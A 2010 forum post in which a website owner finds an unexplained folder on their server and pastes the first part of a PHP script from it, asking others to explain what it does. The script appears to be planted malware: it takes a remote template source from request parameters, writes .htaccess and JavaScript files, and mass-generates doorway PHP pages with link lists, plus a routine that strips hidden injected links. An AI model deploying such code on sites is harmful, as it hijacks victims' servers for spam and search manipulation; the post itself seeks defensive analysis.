I found a folder with a couple of files in it on my site and have no idea how it got there. The folder is really oddly named: kpdbf
and there is an additional file within which is named w.txt
When I viewed the contents it simply stated 'ok1'
If there is anyone willing to have a look at the code below to decipher what it does I'd be really grateful.
Sorry...it's really long so will post it in two parts
This being the first part:
<?php
ignore_user_abort(1);
set_time_limit(0);
function Clear()
{
unlink("c");
unlink("1r.txt");
unlink("2r.txt");
unlink("log");
}
function Clear2()
{
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
$fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
$fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin);
$fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
$fin = ereg_replace("<!--dd4-->", "", $fin);
$fin = ereg_replace("<!--dd5-->", "", $fin);
$fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
echo " upt-ok";
}
function GetVar($name, &$var)
{
$var = "";
if (isset($_POST[$name]))
$var = $_POST[$name];
if (isset($_GET[$name]))
$var = $_GET[$name];
if (($var) =="")
return false;
else return true;
}
function GenNew()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
$sg = $_POST["sg"];
if (isset($_GET["sg"]))
$sg = $_GET["sg"];
$path = "";
$fr = fopen("1r.txt", "a+");
if (file_exists("c"))
{
$fconf = file("c");
$tname = trim($fconf[0]);
}
else
{
$fconf = fopen("c", "w+");
$rnd = mt_rand(0, 999);
$nm = "";
for ($i=0; $i<5; $i++)
{
$ran = mt_rand(0,26);
$sym = $alp[$ran];
$nm = $nm.$sym;
}
$tname = $nm;
mkdir($tname);
fwrite($fconf, $tname);
$pid = 0;
$fht = fopen("$tname/.htaccess", "w+");
$htname = $sg."2.txt";
$fp = fopen($htname, "r");
$fin = '';
while (!feof($fp))
{
$fc = fgets($fp, 1024);
if (!$fc) break;
$fin .= $fc;
}
fclose($fp);
fwrite($fht, $fin);
fclose($fht);
}
$gname = $sg."sgen.php";
for ($j=$pid; $j<$pid+10; $j++)
{
$fc = "";
$fp = fopen($gname, "r");
$fin = '';
while (!feof($fp))
{
$fc = fgets($fp, 1024);
if (!$fc) break;
$fin .= $fc;
}
fclose($fp);
$arr = explode("</html>", $fin);
//print_r($arr);
$curs = trim($arr[1]);
$newf = "$tname/$curs/";
echo "$newf";
mkdir($newf);
$fnd = fopen("$tname/$curs/$curs".".php", "w+");
fwrite($fnd, $fin);
fclose($fnd);
fwrite($fr, "$tname/$curs/$curs".".php\n");
}
}
function Gen2()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
$md = false;
if (isset($_POST["sg"]))
$sg = $_POST["sg"];
if (isset($_GET["sg"]))
$sg = $_GET["sg"];
if (isset($_GET["md"]))
$md = true;
$path = "";
$fr = fopen("1r.txt", "a+");
$f2r = fopen("2r.txt", "a+");
if (file_exists("c"))
{
$fconf = file("c");
$i_dor = trim($fconf[0]);
$i_dor = $i_dor+0;
}
else
{
$fconf = fopen("c", "w+");
$rnd = mt_rand(0, 999);
$nm = "";
for ($i=0; $i<5; $i++)
{
$ran = mt_rand(0,26);
$sym = $alp[$ran];
$nm = $nm.$sym;
}
fwrite($fconf, "0\n");
$pid = 0;
$fht = fopen(".htaccess", "w+");
$htname = $sg."2.txt";
$fp = fopen($htname, "r");
$fin = '';
while (!feof($fp))
{
$fc = fgets($fp, 1024);
if (!$fc) break;
$fin .= $fc;
}
fclose($fp);
fwrite($fht, $fin);
fclose($fht);
$fht = fopen("2.
js", "w+");
$htname = $sg."2js.txt";
$fp = fopen($htname, "r");
$fin = '';
while (!feof($fp))
{
$fc = fgets($fp, 1024);
if (!$fc) break;
$fin .= $fc;
}
fclose($fp);
fwrite($fht, $fin);
fclose($fht);
$f1t = fopen("1t", "w+");
$f1tname = $sg."1t.php";
$fp = fopen($f1tname, "r");
$fin = '';
while (!feof($fp))
{
$fc = fgets($fp, 1024);
if (!$fc) break;
$fin .= $fc;
}
fclose($fp);
fwrite($f1t, $fin);
fclose($f1t);
}
$i_dor++;
$i_dor--;
$a1t = file("1t");
$gname = $sg."sgen2.php";
for ($j=$pid; $j<$pid+10; $j++)
{
$cth = trim($a1t[$i_dor]);
$i_dor++;
$fc = "";
$fp = fopen($gname."?th=$cth", "r");
$fin = '';
while (!feof($fp))
{
$fc = fgets($fp, 1024);
if (!$fc) break;
$fin .= $fc;
}
fclose($fp);
$links ="";
if ($i_dor==196)
{
for ($y=0; $y<75; $y++)
{
$rth = trim($a1t[$y]);
$links .= "<li> <a href='$rth.php'>$rth</a> </li> \n";
}
}
if ($i_dor==197)
{
for ($y=75; $y<150; $y++)
{
$rth = trim($a1t[$y]);
$links .= "<li> <a href='$rth.php'>$rth</a> </li> \n";
}
}
if ($i_dor==198)
{
for ($y=150; $y<225; $y++)
{
$rth = trim($a1t[$y]);
$links .= "<li> <a href='$rth.php'>$rth</a> </li> \n";
}
}
if ($i_dor==199)
{
for ($y=225; $y<300; $y++)
{
$rth = trim($a1t[$y]);
$links .= "<li> <a href='$rth.php'>$rth</a></li> \n";
}
}
$fin = ereg_replace("<LINKS2>", $links, $fin);
$curs = $cth;
$fnd = fopen("$curs".".php", "w+");
fwrite($fnd, $fin);
fclose($fnd);
if (($md) && ($i_dor==196 || $i_dor==197 || $i_dor==198 || $i_dor==199))
{
fwrite($fr, "$curs".".php\n");
}
if (($md) && ($i_dor<196 || $i_dor>199) )
{
fwrite($f2r, "$curs".".php\n");
}
}
$fconf = fopen("c", "w+");
fwrite($fconf, $i_dor."\n");
fclose($fconf);
}
01-08-2010, 04:09 PM
Appeared from nowhere
Similar Threads
Threaded Mode